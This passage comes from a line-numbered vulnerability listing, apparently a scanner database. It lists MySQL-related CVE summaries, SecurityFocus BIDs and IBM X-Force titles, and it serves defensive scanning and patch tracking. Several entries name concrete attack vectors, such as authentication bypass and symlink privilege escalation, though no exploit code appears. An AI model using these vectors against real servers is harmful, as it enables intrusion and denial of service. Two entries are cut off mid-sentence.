10623| [CVE-2012-0112] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0115, CVE-2012-0119, CVE-2012-0120, CVE-2012-0485, and CVE-2012-0492.
10624| [CVE-2012-0102] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.0.x and 5.1.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0087 and CVE-2012-0101.
10625| [CVE-2012-0101] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.0.x and 5.1.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0087 and CVE-2012-0102.
10626| [CVE-2012-0087] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.0.x and 5.1.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0101 and CVE-2012-0102.
10627| [CVE-2012-0075] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.0.x, 5.1.x, and 5.5.x allows remote authenticated users to affect integrity via unknown vectors.
10628| [CVE-2011-5049] MySQL 5.5.8, when running on Windows, allows remote attackers to cause a denial of service (NULL pointer dereference) via a crafted packet to TCP port 3306.
10629| [CVE-2011-2262] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote attackers to affect availability via unknown vectors.
10630| [CVE-2011-1906] Trustwave WebDefend Enterprise before 5.0 7.01.903-1.4 stores specific user-account credentials in a MySQL database, which makes it easier for remote attackers to read the event collection table via requests to the management port, a different vulnerability than CVE-2011-0756.
10631| [CVE-2010-4700] The set_magic_quotes_runtime function in PHP 5.3.2 and 5.3.3, when the MySQLi extension is used, does not properly interact with use of the mysqli_fetch_assoc function, which might make it easier for context-dependent attackers to conduct SQL injection attacks via crafted input that had been properly handled in earlier PHP versions.
10632| [CVE-2010-3840] The Gis_line_string::init_from_wkb function in sql/spatial.cc in MySQL 5.1 before 5.1.51 allows remote authenticated users to cause a denial of service (server crash) by calling the PolyFromWKB function with Well-Known Binary (WKB) data containing a crafted number of (1) line strings or (2) line points.
10633| [CVE-2010-3839] MySQL 5.1 before 5.1.51 and 5.5 before 5.5.6 allows remote authenticated users to cause a denial of service (infinite loop) via multiple invocations of a (1) prepared statement or (2) stored procedure that creates a query with nested JOIN statements.
10634| [CVE-2010-3838] MySQL 5.0 before 5.0.92, 5.1 before 5.1.51, and 5.5 before 5.5.6 allows remote authenticated users to cause a denial of service (server crash) via a query that uses the (1) GREATEST or (2) LEAST function with a mixed list of numeric and LONGBLOB arguments, which is not properly handled when the function's result is "processed using an intermediate temporary table."
10635| [CVE-2010-3837] MySQL 5.0 before 5.0.92, 5.1 before 5.1.51, and 5.5 before 5.5.6 allows remote authenticated users to cause a denial of service (server crash) via a prepared statement that uses GROUP_CONCAT with the WITH ROLLUP modifier, probably triggering a use-after-free error when a copied object is modified in a way that also affects the original object.
10636| [CVE-2010-3836] MySQL 5.0 before 5.0.92, 5.1 before 5.1.51, and 5.5 before 5.5.6 allows remote authenticated users to cause a denial of service (assertion failure and server crash) via vectors related to view preparation, pre-evaluation of LIKE predicates, and IN Optimizers.
10637| [CVE-2010-3835] MySQL 5.1 before 5.1.51 and 5.5 before 5.5.6 allows remote authenticated users to cause a denial of service (mysqld server crash) by performing a user-variable assignment in a logical expression that is calculated and stored in a temporary table for GROUP BY, then causing the expression value to be used after the table is created, which causes the expression to be re-evaluated instead of accessing its value from the table.
10638| [CVE-2010-3834] Unspecified vulnerability in MySQL 5.0 before 5.0.92, 5.1 before 5.1.51, and 5.5 before 5.5.6 allows remote authenticated users to cause a denial of service (server crash) via vectors related to "materializing a derived table that required a temporary table for grouping" and "user variable assignments."
10639| [CVE-2010-3833] MySQL 5.0 before 5.0.92, 5.1 before 5.1.51, and 5.5 before 5.5.6 does not properly propagate type errors, which allows remote attackers to cause a denial of service (server crash) via crafted arguments to extreme-value functions such as (1) LEAST and (2) GREATEST, related to KILL_BAD_DATA and a "CREATE TABLE ... SELECT."
10640| [CVE-2010-3683] Oracle MySQL 5.1 before 5.1.49 and 5.5 before 5.5.5 sends an OK packet when a LOAD DATA INFILE request generates SQL errors, which allows remote authenticated users to cause a denial of service (mysqld daemon crash) via a crafted request.
10641| [CVE-2010-3682] Oracle MySQL 5.1 before 5.1.49 and 5.0 before 5.0.92 allows remote authenticated users to cause a denial of service (mysqld daemon crash) by using EXPLAIN with crafted "SELECT ... UNION ... ORDER BY (SELECT ... WHERE ...)" statements, which triggers a NULL pointer dereference in the Item_singlerow_subselect::store function.
10642| [CVE-2010-3681] Oracle MySQL 5.1 before 5.1.49 and 5.5 before 5.5.5 allows remote authenticated users to cause a denial of service (mysqld daemon crash) by using the HANDLER interface and performing "alternate reads from two indexes on a table," which triggers an assertion failure.
10643| [CVE-2010-3680] Oracle MySQL 5.1 before 5.1.49 allows remote authenticated users to cause a denial of service (mysqld daemon crash) by creating temporary tables with nullable columns while using InnoDB, which triggers an assertion failure.
10644| [CVE-2010-3679] Oracle MySQL 5.1 before 5.1.49 allows remote authenticated users to cause a denial of service (mysqld daemon crash) via certain arguments to the BINLOG command, which triggers an access of uninitialized memory, as demonstrated by valgrind.
10645| [CVE-2010-3678] Oracle MySQL 5.1 before 5.1.49 allows remote authenticated users to cause a denial of service (crash) via (1) IN or (2) CASE operations with NULL arguments that are explicitly specified or indirectly provided by the WITH ROLLUP modifier.
10646| [CVE-2010-3677] Oracle MySQL 5.1 before 5.1.49 and 5.0 before 5.0.92 allows remote authenticated users to cause a denial of service (mysqld daemon crash) via a join query that uses a table with a unique SET column.
10647| [CVE-2010-3676] storage/innobase/dict/dict0crea.c in mysqld in Oracle MySQL 5.1 before 5.1.49 allows remote authenticated users to cause a denial of service (assertion failure) by modifying the (1) innodb_file_format or (2) innodb_file_per_table configuration parameters for the InnoDB storage engine, then executing a DDL statement.
10648| [CVE-2010-3064] Stack-based buffer overflow in the php_mysqlnd_auth_write function in the Mysqlnd extension in PHP 5.3 through 5.3.2 allows context-dependent attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long (1) username or (2) database name argument to the (a) mysql_connect or (b) mysqli_connect function.
10649| [CVE-2010-3063] The php_mysqlnd_read_error_from_line function in the Mysqlnd extension in PHP 5.3 through 5.3.2 does not properly calculate a buffer length, which allows context-dependent attackers to trigger a heap-based buffer overflow via crafted inputs that cause a negative length value to be used.
10650| [CVE-2010-3062] mysqlnd_wireprotocol.c in the Mysqlnd extension in PHP 5.3 through 5.3.2 allows remote attackers to (1) read sensitive memory via a modified length value, which is not properly handled by the php_mysqlnd_ok_read function
10651| [CVE-2010-2008] MySQL before 5.1.48 allows remote authenticated users with alter database privileges to cause a denial of service (server crash and database loss) via an ALTER DATABASE command with a #mysql50# string followed by a . (dot), .. (dot dot), ../ (dot dot slash) or similar sequence, and an UPGRADE DATA DIRECTORY NAME command, which causes MySQL to move certain directories to the server data directory.
10652| [CVE-2010-1850] Buffer overflow in MySQL 5.0 through 5.0.91 and 5.1 before 5.1.47 allows remote authenticated users to execute arbitrary code via a COM_FIELD_LIST command with a long table name.
10653| [CVE-2010-1849] The my_net_skip_rest function in sql/net_serv.cc in MySQL 5.0 through 5.0.91 and 5.1 before 5.1.47 allows remote attackers to cause a denial of service (CPU and bandwidth consumption) by sending a large number of packets that exceed the maximum length.
10654| [CVE-2010-1848] Directory traversal vulnerability in MySQL 5.0 through 5.0.91 and 5.1 before 5.1.47 allows remote authenticated users to bypass intended table grants to read field definitions of arbitrary tables, and on 5.1 to read or delete content of arbitrary tables, via a .. (dot dot) in a table name.
10655| [CVE-2010-1626] MySQL before 5.1.46 allows local users to delete the data and index files of another user's MyISAM table via a symlink attack in conjunction with the DROP TABLE command, a different vulnerability than CVE-2008-4098 and CVE-2008-7247.
10656| [CVE-2010-1621] The mysql_uninstall_plugin function in sql/sql_plugin.cc in MySQL 5.1 before 5.1.46 does not check privileges before uninstalling a plugin, which allows remote attackers to uninstall arbitrary plugins via the UNINSTALL PLUGIN command.
10657| [CVE-2009-5026] The executable comment feature in MySQL 5.0.x before 5.0.93 and 5.1.x before 5.1.50, when running in certain slave configurations in which the slave is running a newer version than the master, allows remote attackers to execute arbitrary SQL commands via custom comments.
10658| [CVE-2009-4484] Multiple stack-based buffer overflows in the CertDecoder::GetName function in src/asn.cpp in TaoCrypt in yaSSL before 1.9.9, as used in mysqld in MySQL 5.0.x before 5.0.90, MySQL 5.1.x before 5.1.43, MySQL 5.5.x through 5.5.0-m2, and other products, allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption and daemon crash) by establishing an SSL connection and sending an X.509 client certificate with a crafted name field, as demonstrated by mysql_overflow1.py and the vd_mysql5 module in VulnDisco Pack Professional 8.11. NOTE: this was originally reported for MySQL 5.0.51a.
10659| [CVE-2009-4030] MySQL 5.1.x before 5.1.41 allows local users to bypass certain privilege checks by calling CREATE TABLE on a MyISAM table with modified (1) DATA DIRECTORY or (2) INDEX DIRECTORY arguments that are originally associated with pathnames without symlinks, and that can point to tables created at a future time at which a pathname is modified to contain a symlink to a subdirectory of the MySQL data home directory, related to incorrect calculation of the mysql_unpacked_real_data_home value. NOTE: this vulnerability exists because of an incomplete fix for CVE-2008-4098 and CVE-2008-2079.
10660| [CVE-2009-4028] The vio_verify_callback function in viosslfactories.c in MySQL 5.0.x before 5.0.88 and 5.1.x before 5.1.41, when OpenSSL is used, accepts a value of zero for the depth of X.509 certificates, which allows man-in-the-middle attackers to spoof arbitrary SSL-based MySQL servers via a crafted certificate, as demonstrated by a certificate presented by a server linked against the yaSSL library.
10661| [CVE-2009-4019] mysqld in MySQL 5.0.x before 5.0.88 and 5.1.x before 5.1.41 does not (1) properly handle errors during execution of certain SELECT statements with subqueries, and does not (2) preserve certain null_value flags during execution of statements that use the GeomFromWKB function, which allows remote authenticated users to cause a denial of service (daemon crash) via a crafted statement.
10662| [CVE-2009-2446] Multiple format string vulnerabilities in the dispatch_command function in libmysqld/sql_parse.cc in mysqld in MySQL 4.0.0 through 5.0.83 allow remote authenticated users to cause a denial of service (daemon crash) and possibly have unspecified other impact via format string specifiers in a database name in a (1) COM_CREATE_DB or (2) COM_DROP_DB request. NOTE: some of these details are obtained from third party information.
10663| [CVE-2009-0819] sql/item_xmlfunc.cc in MySQL 5.1 before 5.1.32 and 6.0 before 6.0.10 allows remote authenticated users to cause a denial of service (crash) via "an XPath expression employing a scalar expression as a FilterExpr with ExtractValue() or UpdateXML()," which triggers an assertion failure.
10664| [CVE-2008-7247] sql/sql_table.cc in MySQL 5.0.x through 5.0.88, 5.1.x through 5.1.41, and 6.0 before 6.0.9-alpha, when the data home directory contains a symlink to a different filesystem, allows remote authenticated users to bypass intended access restrictions by calling CREATE TABLE with a (1) DATA DIRECTORY or (2) INDEX DIRECTORY argument referring to a subdirectory that requires following this symlink.
10665| [CVE-2008-4456] Cross-site scripting (XSS) vulnerability in the command-line client in MySQL 5.0.26 through 5.0.45, and other versions including versions later than 5.0.45, when the --html option is enabled, allows attackers to inject arbitrary web script or HTML by placing it in a database cell, which might be accessed by this client when composing an HTML document. NOTE: as of 20081031, the issue has not been fixed in MySQL 5.0.67.
10666| [CVE-2008-4098] MySQL before 5.0.67 allows local users to bypass certain privilege checks by calling CREATE TABLE on a MyISAM table with modified (1) DATA DIRECTORY or (2) INDEX DIRECTORY arguments that are originally associated with pathnames without symlinks, and that can point to tables created at a future time at which a pathname is modified to contain a symlink to a subdirectory of the MySQL home data directory. NOTE: this vulnerability exists because of an incomplete fix for CVE-2008-4097.
10667| [CVE-2008-4097] MySQL 5.0.51a allows local users to bypass certain privilege checks by calling CREATE TABLE on a MyISAM table with modified (1) DATA DIRECTORY or (2) INDEX DIRECTORY arguments that are associated with symlinks within pathnames for subdirectories of the MySQL home data directory, which are followed when tables are created in the future. NOTE: this vulnerability exists because of an incomplete fix for CVE-2008-2079.
10668| [CVE-2008-3963] MySQL 5.0 before 5.0.66, 5.1 before 5.1.26, and 6.0 before 6.0.6 does not properly handle a b'' (b single-quote single-quote) token, aka an empty bit-string literal, which allows remote attackers to cause a denial of service (daemon crash) by using this token in a SQL statement.
10669| [CVE-2008-2079] MySQL 4.1.x before 4.1.24, 5.0.x before 5.0.60, 5.1.x before 5.1.24, and 6.0.x before 6.0.5 allows local users to bypass certain privilege checks by calling CREATE TABLE on a MyISAM table with modified (1) DATA DIRECTORY or (2) INDEX DIRECTORY arguments that are within the MySQL home data directory, which can point to tables that are created in the future.
10670| [CVE-2008-1486] SQL injection vulnerability in Phorum before 5.2.6, when mysql_use_ft is disabled, allows remote attackers to execute arbitrary SQL commands via the non-fulltext search.
10671| [CVE-2007-6313] MySQL Server 5.1.x before 5.1.23 and 6.0.x before 6.0.4 does not check the rights of the entity executing BINLOG, which allows remote authorized users to execute arbitrary BINLOG statements.
10672| [CVE-2007-6304] The federated engine in MySQL 5.0.x before 5.0.51a, 5.1.x before 5.1.23, and 6.0.x before 6.0.4, when performing a certain SHOW TABLE STATUS query, allows remote MySQL servers to cause a denial of service (federated handler crash and daemon crash) via a response that lacks the minimum required number of columns.
10673| [CVE-2007-6303] MySQL 5.0.x before 5.0.51a, 5.1.x before 5.1.23, and 6.0.x before 6.0.4 does not update the DEFINER value of a view when the view is altered, which allows remote authenticated users to gain privileges via a sequence of statements including a CREATE SQL SECURITY DEFINER VIEW statement and an ALTER VIEW statement.
10674| [CVE-2007-5970] MySQL 5.1.x before 5.1.23 and 6.0.x before 6.0.4 allows remote authenticated users to gain privileges on arbitrary tables via unspecified vectors involving use of table-level DATA DIRECTORY and INDEX DIRECTORY options when creating a partitioned table with the same name as a table on which the user lacks privileges.
10675| [CVE-2007-5969] MySQL Community Server 5.0.x before 5.0.51, Enterprise Server 5.0.x before 5.0.52, Server 5.1.x before 5.1.23, and Server 6.0.x before 6.0.4, when a table relies on symlinks created through explicit DATA DIRECTORY and INDEX DIRECTORY options, allows remote authenticated users to overwrite system table information and gain privileges via a RENAME TABLE statement that changes the symlink to point to an existing file.
10676| [CVE-2007-5925] The convert_search_mode_to_innobase function in ha_innodb.cc in the InnoDB engine in MySQL 5.1.23-BK and earlier allows remote authenticated users to cause a denial of service (database crash) via a certain CONTAINS operation on an indexed column, which triggers an assertion error.
10677| [CVE-2007-5646] SQL injection vulnerability in Sources/Search.php in Simple Machines Forum (SMF) 1.1.3, when MySQL 5 is used, allows remote attackers to execute arbitrary SQL commands via the userspec parameter in a search2 action to index.php.
10678| [CVE-2007-4889] The MySQL extension in PHP 5.2.4 and earlier allows remote attackers to bypass safe_mode and open_basedir restrictions via the MySQL (1) LOAD_FILE, (2) INTO DUMPFILE, and (3) INTO OUTFILE functions, a different issue than CVE-2007-3997.
10679| [CVE-2007-3997] The (1) MySQL and (2) MySQLi extensions in PHP 4 before 4.4.8, and PHP 5 before 5.2.4, allow remote attackers to bypass safe_mode and open_basedir restrictions via MySQL LOCAL INFILE operations, as demonstrated by a query with LOAD DATA LOCAL INFILE.
10680| [CVE-2007-3782] MySQL Community Server before 5.0.45 allows remote authenticated users to gain update privileges for a table in another database via a view that refers to this external table.
10681| [CVE-2007-3781] MySQL Community Server before 5.0.45 does not require privileges such as SELECT for the source table in a CREATE TABLE LIKE statement, which allows remote authenticated users to obtain sensitive information such as the table structure.
10682| [CVE-2007-3780] MySQL Community Server before 5.0.45 allows remote attackers to cause a denial of service (daemon crash) via a malformed password packet in the connection protocol.
10683| [CVE-2007-2693] MySQL before 5.1.18 allows remote authenticated users without SELECT privileges to obtain sensitive information from partitioned tables via an ALTER TABLE statement.
10684| [CVE-2007-2692] The mysql_change_db function in MySQL 5.0.x before 5.0.40 and 5.1.x before 5.1.18 does not restore THD::db_access privileges when returning from SQL SECURITY INVOKER stored routines, which allows remote authenticated users to gain privileges.
10685| [CVE-2007-2691] MySQL before 4.1.23, 5.0.x before 5.0.42, and 5.1.x before 5.1.18 does not require the DROP privilege for RENAME TABLE statements, which allows remote authenticated users to rename arbitrary tables.
10686| [CVE-2007-2583] The in_decimal::set function in item_cmpfunc.cc in MySQL before 5.0.40, and 5.1 before 5.1.18-beta, allows context-dependent attackers to cause a denial of service (crash) via a crafted IF clause that results in a divide-by-zero error and a NULL pointer dereference.
10687| [CVE-2007-1420] MySQL 5.x before 5.0.36 allows local users to cause a denial of service (database crash) by performing information_schema table subselects and using ORDER BY to sort a single-row result, which prevents certain structure elements from being initialized and triggers a NULL dereference in the filesort function.
10688| [CVE-2006-7232] sql_select.cc in MySQL 5.0.x before 5.0.32 and 5.1.x before 5.1.14 allows remote authenticated users to cause a denial of service (crash) via an EXPLAIN SELECT FROM on the INFORMATION_SCHEMA table, as originally demonstrated using ORDER BY.
10689| [CVE-2006-4835] Bluview Blue Magic Board (BMB) (aka BMForum) 5.5 allows remote attackers to obtain sensitive information via a direct request to (1) footer.php, (2) header.php, (3) db_mysql_error.php, (4) langlist.php, (5) sendmail.php, or (6) style.php, which reveals the path in various error messages.
10690| [CVE-2006-4227] MySQL before 5.0.25 and 5.1 before 5.1.12 evaluates arguments of suid routines in the security context of the routine's definer instead of the routine's caller, which allows remote authenticated users to gain privileges through a routine that has been made available using GRANT EXECUTE.
10691| [CVE-2006-4226] MySQL before 4.1.21, 5.0 before 5.0.25, and 5.1 before 5.1.12, when run on case-sensitive filesystems, allows remote authenticated users to create or access a database when the database name differs only in case from a database for which they have permissions.
10692| [CVE-2006-4031] MySQL 4.1 before 4.1.21 and 5.0 before 5.0.24 allows a local user to access a table through a previously created MERGE table, even after the user's privileges are revoked for the original table, which might violate intended security policy.
10693| [CVE-2006-3486] ** DISPUTED ** Off-by-one buffer overflow in the Instance_options::complete_initialization function in instance_options.cc in the Instance Manager in MySQL before 5.0.23 and 5.1 before 5.1.12 might allow local users to cause a denial of service (application crash) via unspecified vectors, which triggers the overflow when the convert_dirname function is called. NOTE: the vendor has disputed this issue via e-mail to CVE, saying that it is only exploitable when the user has access to the configuration file or the Instance Manager daemon. Due to intended functionality, this level of access would already allow the user to disrupt program operation, so this does not cross security boundaries and is not a vulnerability.
10694| [CVE-2006-3469] Format string vulnerability in time.cc in MySQL Server 4.1 before 4.1.21 and 5.0 before 1 April 2006 allows remote authenticated users to cause a denial of service (crash) via a format string instead of a date as the first parameter to the date_format function, which is later used in a formatted print call to display the error message.
10695| [CVE-2006-3081] mysqld in MySQL 4.1.x before 4.1.18, 5.0.x before 5.0.19, and 5.1.x before 5.1.6 allows remote authorized users to cause a denial of service (crash) via a NULL second argument to the str_to_date function.
10696| [CVE-2006-2753] SQL injection vulnerability in MySQL 4.1.x before 4.1.20 and 5.0.x before 5.0.22 allows context-dependent attackers to execute arbitrary SQL commands via crafted multibyte encodings in character sets such as SJIS, BIG5, and GBK, which are not properly handled when the mysql_real_escape function is used to escape the input.
10697| [CVE-2006-1518] Buffer overflow in the open_table function in sql_base.cc in MySQL 5.0.x up to 5.0.20 might allow remote attackers to execute arbitrary code via crafted COM_TABLE_DUMP packets with invalid length values.
10698| [CVE-2006-1517] sql_parse.cc in MySQL 4.0.x up to 4.0.26, 4.1.x up to 4.1.18, and 5.0.x up to 5.0.20 allows remote attackers to obtain sensitive information via a COM_TABLE_DUMP request with an incorrect packet length, which includes portions of memory in an error message.
10699| [CVE-2006-1516] The check_connection function in sql_parse.cc in MySQL 4.0.x up to 4.0.26, 4.1.x up to 4.1.18, and 5.0.x up to 5.0.20 allows remote attackers to read portions of memory via a username without a trailing null byte, which causes a buffer over-read.
10700| [CVE-2006-0903] MySQL 5.0.18 and earlier allows local users to bypass logging mechanisms via SQL queries that contain the NULL character, which are not properly handled by the mysql_real_query function. NOTE: this issue was originally reported for the mysql_query function, but the vendor states that since mysql_query expects a null character, this is not an issue for mysql_query.
10701| [CVE-2006-0369] ** DISPUTED ** MySQL 5.0.18 allows local users with access to a VIEW to obtain sensitive information via the "SELECT * FROM information_schema.views
10702| [CVE-2006-0200] Format string vulnerability in the error-reporting feature in the mysqli extension in PHP 5.1.0 and 5.1.1 might allow remote attackers to execute arbitrary code via format string specifiers in MySQL error messages.
10703| [CVE-2005-2573] The mysql_create_function function in sql_udf.cc for MySQL 4.0 before 4.0.25, 4.1 before 4.1.13, and 5.0 before 5.0.7-beta, when running on Windows, uses an incomplete blacklist in a directory traversal check, which allows attackers to include arbitrary files via the backslash (\) character.
10704| [CVE-2005-2558] Stack-based buffer overflow in the init_syms function in MySQL 4.0 before 4.0.25, 4.1 before 4.1.13, and 5.0 before 5.0.7-beta allows remote authenticated users who can create user-defined functions to execute arbitrary code via a long function_name field.
10705| [CVE-2005-1636] mysql_install_db in MySQL 4.1.x before 4.1.12 and 5.x up to 5.0.4 creates the mysql_install_db.X file with a predictable filename and insecure permissions, which allows local users to execute arbitrary SQL commands by modifying the file's contents.
10706| [CVE-2005-0004] The mysqlaccess script in MySQL 4.0.23 and earlier, 4.1.x before 4.1.10, 5.0.x before 5.0.3, and other versions including 3.x, allows local users to overwrite arbitrary files or read temporary files via a symlink attack on temporary files.
10707| [CVE-2004-0835] MySQL 3.x before 3.23.59, 4.x before 4.0.19, 4.1.x before 4.1.2, and 5.x before 5.0.1, checks the CREATE/INSERT rights of the original table instead of the target table in an ALTER TABLE RENAME operation, which could allow attackers to conduct unauthorized activities.
10708| [CVE-2004-0628] Stack-based buffer overflow in MySQL 4.1.x before 4.1.3, and 5.0, allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long scramble string.
10709| [CVE-2004-0627] The check_scramble_323 function in MySQL 4.1.x before 4.1.3, and 5.0, allows remote attackers to bypass authentication via a zero-length scrambled string.
10710|
10711| SecurityFocus - https://www.securityfocus.com/bid/:
10712| [52154] RETIRED: MySQL 5.5.20 Unspecified Remote Code Execution Vulnerability
10713| [47871] Oracle MySQL Prior to 5.1.52 Multiple Denial Of Service Vulnerabilities
10714| [43677] Oracle MySQL Prior to 5.1.50 Privilege Escalation Vulnerability
10715| [43676] Oracle MySQL Prior to 5.1.51 Multiple Denial Of Service Vulnerabilities
10716| [42646] Oracle MySQL Prior to 5.1.49 'JOIN' Statement Denial Of Service Vulnerability
10717| [42643] Oracle MySQL Prior to 5.1.49 'DDL' Statements Denial Of Service Vulnerability
10718| [42638] Oracle MySQL Prior to 5.1.49 Malformed 'BINLOG' Arguments Denial Of Service Vulnerability
10719| [42596] Oracle MySQL Prior to 5.1.49 'WITH ROLLUP' Denial Of Service Vulnerability
10720| [42586] RETIRED: Oracle MySQL Prior to 5.1.49 Multiple Denial Of Service Vulnerabilities
10721| [37640] MySQL 5.0.51a Unspecified Remote Code Execution Vulnerability
10722| [36242] MySQL 5.x Unspecified Buffer Overflow Vulnerability
10723|
10724| IBM X-Force - https://exchange.xforce.ibmcloud.com:
10725| [85724] Oracle MySQL Server XA Transactions denial of service
10726| [85723] Oracle MySQL Server Server Replication denial of service
10727| [85722] Oracle MySQL Server InnoDB denial of service
10728| [85721] Oracle MySQL Server Server Privileges unspecified
10729| [85720] Oracle MySQL Server Server Partition denial of service
10730| [85719] Oracle MySQL Server Server Parser denial of service
10731| [85718] Oracle MySQL Server Server Options denial of service
10732| [85717] Oracle MySQL Server Server Options denial of service
10733| [85716] Oracle MySQL Server Server Optimizer denial of service
10734| [85715] Oracle MySQL Server Server Optimizer denial of service
10735| [85714] Oracle MySQL Server Prepared Statements denial of service
10736| [85713] Oracle MySQL Server InnoDB denial of service
10737| [85712] Oracle MySQL Server Full Text Search denial of service
10738| [85711] Oracle MySQL Server Data Manipulation Language denial of service
10739| [85710] Oracle MySQL Server Data Manipulation Language denial of service
10740| [85709] Oracle MySQL Server Audit Log unspecified
10741| [85708] Oracle MySQL Server MemCached unspecified
10742| [84846] Debian mysql-server package information disclosure
10743| [84375] Wireshark MySQL dissector denial of service
10744| [83554] Oracle MySQL Server Server Partition denial of service
10745| [83553] Oracle MySQL Server Server Locking denial of service
10746| [83552] Oracle MySQL Server Server Install unspecified
10747| [83551] Oracle MySQL Server Server Types denial of service
10748| [83550] Oracle MySQL Server Server Privileges unspecified
10749| [83549] Oracle MySQL Server InnoDB denial of service
10750| [83548] Oracle MySQL Server InnoDB denial of service
10751| [83547] Oracle MySQL Server Data Manipulation Language denial of service
10752| [83546] Oracle MySQL Server Stored Procedure denial of service
10753| [83545] Oracle MySQL Server Server Replication denial of service
10754| [83544] Oracle MySQL Server Server Partition denial of service
10755| [83543] Oracle MySQL Server Server Optimizer denial of service
10756| [83542] Oracle MySQL Server InnoDB denial of service
10757| [83541] Oracle MySQL Server Information Schema denial of service
10758| [83540] Oracle MySQL Server Data Manipulation Language denial of service
10759| [83539] Oracle MySQL Server Data Manipulation Language denial of service
10760| [83538] Oracle MySQL Server Server Optimizer unspecified
10761| [83537] Oracle MySQL Server MemCached denial of service
10762| [83536] Oracle MySQL Server Server Privileges unspecified
10763| [83535] Oracle MySQL Server Server Privileges unspecified
10764| [83534] Oracle MySQL Server Server unspecified
10765| [83533] Oracle MySQL Server Information Schema unspecified
10766| [83532] Oracle MySQL Server Server Locking unspecified
10767| [83531] Oracle MySQL Server Data Manipulation Language denial of service
10768| [83388] MySQL administrative login attempt detected
10769| [82963] Mambo MySQL database information disclosure
10770| [82946] Oracle MySQL buffer overflow
10771| [82945] Oracle MySQL buffer overflow
10772| [82895] Oracle MySQL and MariaDB geometry queries denial of service
10773| [81577] MySQL2JSON extension for TYPO3 unspecified SQL injection
10774| [81325] Oracle MySQL Server Server Privileges denial of service
10775| [81324] Oracle MySQL Server Server Partition denial of service
10776| [81323] Oracle MySQL Server Server Optimizer denial of service
10777| [81322] Oracle MySQL Server Server Optimizer denial of service
10778| [81321] Oracle MySQL Server Server denial of service
10779| [81320] Oracle MySQL Server MyISAM denial of service
10780| [81319] Oracle MySQL Server InnoDB denial of service
10781| [81318] Oracle MySQL Server InnoDB denial of service
10782| [81317] Oracle MySQL Server Server Locking denial of service
10783| [81316] Oracle MySQL Server Server denial of service
10784| [81315] Oracle MySQL Server Server Replication unspecified
10785| [81314] Oracle MySQL Server Server Replication unspecified
10786| [81313] Oracle MySQL Server Stored Procedure denial of service
10787| [81312] Oracle MySQL Server Server Optimizer denial of service
10788| [81311] Oracle MySQL Server Information Schema denial of service
10789| [81310] Oracle MySQL Server GIS Extension denial of service
10790| [80790] Oracle MySQL yaSSL buffer overflow
10791| [80553] Oracle MySQL and MariaDB salt security bypass
10792| [80443] Oracle MySQL Server unspecified code execution
10793| [80442] Oracle MySQL Server acl_get() buffer overflow
10794| [80440] Oracle MySQL Server table buffer overflow
10795| [80435] Oracle MySQL Server database privilege escalation
10796| [80434] Oracle MySQL Server COM_BINLOG_DUMP denial of service
10797| [80433] Oracle MySQL Server Stuxnet privilege escalation
10798| [80432] Oracle MySQL Server authentication information disclosure
10799| [79394] Oracle MySQL Server Server Installation information disclosure
10800| [79393] Oracle MySQL Server Server Replication denial of service
10801| [79392] Oracle MySQL Server Server Full Text Search denial of service
10802| [79391] Oracle MySQL Server Server denial of service
10803| [79390] Oracle MySQL Server Client information disclosure
10804| [79389] Oracle MySQL Server Server Optimizer denial of service
10805| [79388] Oracle MySQL Server Server Optimizer denial of service
10806| [79387] Oracle MySQL Server Server denial of service
10807| [79386] Oracle MySQL Server InnoDB Plugin denial of service
10808| [79385] Oracle MySQL Server InnoDB denial of service
10809| [79384] Oracle MySQL Server Client unspecified
10810| [79383] Oracle MySQL Server Server denial of service
10811| [79382] Oracle MySQL Server Protocol unspecified
10812| [79381] Oracle MySQL Server Information Schema unspecified
10813| [78954] SilverStripe MySQLDatabase.php information disclosure
10814| [78948] MySQL MyISAM table symlink
10815| [77865] MySQL unknown vuln
10816| [77864] MySQL sort order denial of service
10817| [77768] MySQLDumper refresh_dblist.php information disclosure
10818| [77177] MySQL Squid Access Report unspecified cross-site scripting
10819| [77065] Oracle MySQL Server Optimizer denial of service
10820| [77064] Oracle MySQL Server Optimizer denial of service
10821| [77063] Oracle MySQL Server denial of service
10822| [77062] Oracle MySQL InnoDB denial of service
10823| [77061] Oracle MySQL GIS Extension denial of service
10824| [77060] Oracle MySQL Server Optimizer denial of service
10825| [76189] MySQL unspecified error
10826| [76188] MySQL attempts security bypass
10827| [75287] MySQLDumper restore.php information disclosure
10828| [75286] MySQLDumper filemanagement.php directory traversal
10829| [75285] MySQLDumper main.php cross-site request forgery
10830| [75284] MySQLDumper install.php cross-site scripting
10831| [75283] MySQLDumper install.php file include
10832| [75282] MySQLDumper menu.php code execution
10833| [75022] Oracle MySQL Server Server Optimizer denial of service
10834| [75021] Oracle MySQL Server Server Optimizer denial of service
10835| [75020] Oracle MySQL Server Server DML denial of service
10836| [75019] Oracle MySQL Server Partition denial of service
10837| [75018] Oracle MySQL Server MyISAM denial of service
10838| [75017] Oracle MySQL Server Server Optimizer denial of service
10839| [74672] Oracle MySQL Server multiple unspecified
10840| [73092] MySQL unspecified code execution
10841| [72540] Oracle MySQL Server denial of service
10842| [72539] Oracle MySQL Server unspecified
10843| [72538] Oracle MySQL Server denial of service
10844| [72537] Oracle MySQL Server denial of service
10845| [72536] Oracle MySQL Server unspecified
10846| [72535] Oracle MySQL Server denial of service
10847| [72534] Oracle MySQL Server denial of service
10848| [72533] Oracle MySQL Server denial of service
10849| [72532] Oracle MySQL Server denial of service
10850| [72531] Oracle MySQL Server denial of service
10851| [72530] Oracle MySQL Server denial of service
10852| [72529] Oracle MySQL Server denial of service
10853| [72528] Oracle MySQL Server denial of service
10854| [72527] Oracle MySQL Server denial of service
10855| [72526] Oracle MySQL Server denial of service
10856| [72525] Oracle MySQL Server information disclosure
10857| [72524] Oracle MySQL Server denial of service
10858| [72523] Oracle MySQL Server denial of service
10859| [72522] Oracle MySQL Server denial of service
10860| [72521] Oracle MySQL Server denial of service
